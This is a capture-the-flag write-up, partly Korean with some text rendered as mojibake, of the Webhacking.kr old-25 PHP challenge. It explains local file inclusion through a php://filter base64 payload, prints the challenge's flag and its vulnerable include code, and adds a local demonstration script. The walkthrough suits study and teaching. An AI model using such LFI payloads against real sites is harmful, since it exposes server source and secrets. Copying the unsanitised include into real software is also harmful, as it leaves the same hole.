
[Wargame] Webhacking.kr old-25 (PHP)

🚩 Understanding the problem



๋ฌธ์ œ ํŽ˜์ด์ง€์— ๋“ค์–ด๊ฐ€๋ฉด /?file=hello ๋ผ๋Š” url๋กœ ์—ฐ๊ฒฐ๋˜๊ณ , hello.php ๋ผ๋Š” ํŒŒ์ผ์˜ ๋‚ด์šฉ์ด ์ถœ๋ ฅ๋˜๋Š” ๊ฒƒ์œผ๋กœ ๋ณด์ด๋Š” ํŽ˜์ด์ง€๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋‹ค. ์ด๋กœ ๋ณด์•„, url์˜ ํŒŒ๋ผ๋ฏธํ„ฐ๋กœ ํŒŒ์ผ๋ช…์„ ์ „๋‹ฌํ•˜๋ฉด ํ•ด๋‹น ํŒŒ์ผ์„ ์ฝ์„ ์ˆ˜ ์žˆ๋Š” ๊ฒƒ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค.


Requesting /?file=index returns nothing at all, but requesting /?file=flag displays the string FLAG is in the code, as shown above. This suggests that flag.php was executed rather than read, and that the flag value can only be obtained by reading the file's source.



๐Ÿšฉ ๋ฌธ์ œ ํ’€์ด


Solving this requires the concept of PHP wrappers. PHP's built-in wrappers provide a number of URL-style protocols that can be used with the filesystem functions. The details are in the official PHP documentation.



๊ณต์‹ ๋ฌธ์„œ์—์„œ wrapper์˜ ์ข…๋ฅ˜๋ฅผ ํ™•์ธํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, ์ด ์ค‘์—์„œ ์šฐ๋ฆฌ๋Š” ํŒŒ์ผ์„ ์ฝ์–ด์•ผ ํ•˜๊ธฐ ๋•Œ๋ฌธ์— I/O streams์™€ ๊ด€๋ จ๋œ php:// wrapper๋ฅผ ์‚ฌ์šฉํ•  ๊ฒƒ์ด๋‹ค.


Among these, php://filter lets us specify a particular file path, the filter to apply, and so on through its parameters. The list of filters PHP provides can be found in the official documentation, and several of them could be used to extract the file.


์‚ฌ์šฉ ๋ฐฉ๋ฒ•์€ php://filter/read={์ ์šฉํ•˜๋ ค๋Š” ํ•„ํ„ฐ}/resource={ํŒŒ์ผ ๊ฒฝ๋กœ}์ด๋‹ค.

ํŒŒ์ผ์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ์—ˆ๋˜ ํ•„ํ„ฐ๋Š” string.rot13, convert.base64-encode, convert.quoted-printable-encode ๋“ฑ์ด ์žˆ์—ˆ๋‹ค.



Using convert.base64-encode, one of the available filters, the URL payload can be written as php://filter/read=convert.base64-encode/resource=./flag; sending a request with it returns the base64-encoded value shown above.


<?php
  echo "FLAG is in the code";
  $flag = "FLAG{this_is_your_first_flag}";
?>

Decoding this value reveals the flag.
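To make the include-versus-read distinction concrete, the following script is an added example (not code from the write-up or the challenge server) that reproduces it locally against a constructed temporary file with a placeholder flag. It runs offline with the PHP CLI and touches nothing but that file.

```php
<?php
// Added example, not code from the write-up or the challenge server. It
// reproduces the include-versus-read distinction locally against a
// constructed temporary file, so it can be run offline with the PHP CLI.

// Constructed stand-in for flag.php; the flag value is a placeholder.
$src = "<?php\n  echo \"FLAG is in the code\";\n  \$flag = \"FLAG{placeholder}\";\n?>\n";
$tmp = sys_get_temp_dir() . '/wh25_' . bin2hex(random_bytes(4)) . '.php';
file_put_contents($tmp, $src);

// 1. Plain include of the .php file: the interpreter executes it, so the
//    client only sees the echo output and the $flag assignment stays hidden.
echo "--- include of the .php file ---\n";
include $tmp;
echo "\n";

// 2. include through php://filter: the wrapper opens the file as a byte
//    stream, applies the filter and hands the encoded text to include. Base64
//    output contains no "<?php" open tag, so PHP emits it as literal text
//    instead of executing it. This is the behaviour the payload relies on.
$filtered = "php://filter/read=convert.base64-encode/resource={$tmp}";
echo "--- include via php://filter ---\n";
include $filtered;
echo "\n";

// 3. The same stream read with file_get_contents and decoded gives back the
//    source byte for byte, which is where the flag becomes readable.
$decoded = base64_decode(file_get_contents($filtered), true);
echo "--- decoded ---\n", $decoded;
var_dump($decoded === $src); // bool(true)

// 4. The other filters named in the write-up. string.rot13 rewrites "<?php"
//    as "<?cuc", which the parser does not recognise as an open tag, so the
//    rotated source is likewise printed instead of executed.
foreach (['string.rot13', 'convert.quoted-printable-encode'] as $f) {
    echo "--- {$f} ---\n", file_get_contents("php://filter/read={$f}/resource={$tmp}"), "\n";
}

unlink($tmp);
```

Run it with the PHP CLI (php example.php). The point to take away is that include decides how to treat a stream by its content, not by its extension: the original file starts with an open tag and is executed, while the filtered stream starts with encoded text and is echoed verbatim.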



🚩 Further analysis


<?php
  echo("<pre>");
  system("ls -al");
  echo("</pre>");
  if(!$_GET['file']) echo("<meta http-equiv=refresh content=0;url=?file=hello>");
  echo "<hr><textarea rows=10 cols=100>";
  $file = $_GET['file'].".php";
  if($file == "index.php") exit(); // anti infinite loop
  include $file;
  echo "</textarea>";
?>

๊ฐ™์€ ๋ฐฉ์‹์œผ๋กœ index.php ํŒŒ์ผ์„ ์ถ”์ถœํ•  ์ˆ˜ ์žˆ๋Š”๋ฐ, include $file; ๋ถ€๋ถ„์—์„œ LFI ์ทจ์•ฝ์ ์ด ๋ฐœ์ƒํ•˜๋Š” ๊ฒƒ์„ ํ™•์ธํ•  ์ˆ˜ ์žˆ์—ˆ๋‹ค.
